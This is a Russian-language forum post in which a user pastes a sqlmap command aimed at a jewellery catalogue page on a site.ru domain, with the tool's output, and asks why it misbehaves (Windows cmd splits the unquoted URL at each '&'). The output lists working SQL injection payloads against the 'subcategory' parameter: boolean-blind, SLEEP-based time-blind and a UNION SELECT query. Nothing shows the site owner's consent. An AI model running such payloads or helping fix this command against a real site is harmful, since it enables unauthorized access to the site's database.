
26.04.2017, 02:32
|
|
Участник форума
Регистрация: 13.11.2010
Сообщений: 184
С нами:
8155766
Репутация:
2
|
|
Что я делаю не так ???
Код:
D:\>python\python.exe D:\py\sqlmap\sqlmap.py -u http://site.ru/jewell
ery.php?subcategory=8&parent_ID=8&sub=&open=339 --dbs
___
__H__
___ ___[)]_____ ___ ___ {1.1.4.48#dev}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 02:20:02
[02:20:02] [INFO] resuming back-end DBMS 'mysql'
[02:20:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: subcategory (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: subcategory=8 AND 7118=7118
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: subcategory=8 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: subcategory=8 UNION ALL SELECT CONCAT(0x7162627171,0x7665706c754e46
41694f424f67757945514458435369775648614c62644a56574b536753446d634f,0x7178716271)
,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Dnsi
---
[02:20:08] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.3.29
back-end DBMS: MySQL >= 5.0.12
[02:20:08] [INFO] fetched data logged to text files under 'C:\Users\user\.sqlmap\
output\site.ru'
[*] shutting down at 02:20:08
И почему у меня после выполнения команды вылазиет такое сообщение ?
Код:
"parent_ID" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.
"sub" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.
"open" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.
D:\>
|
|
|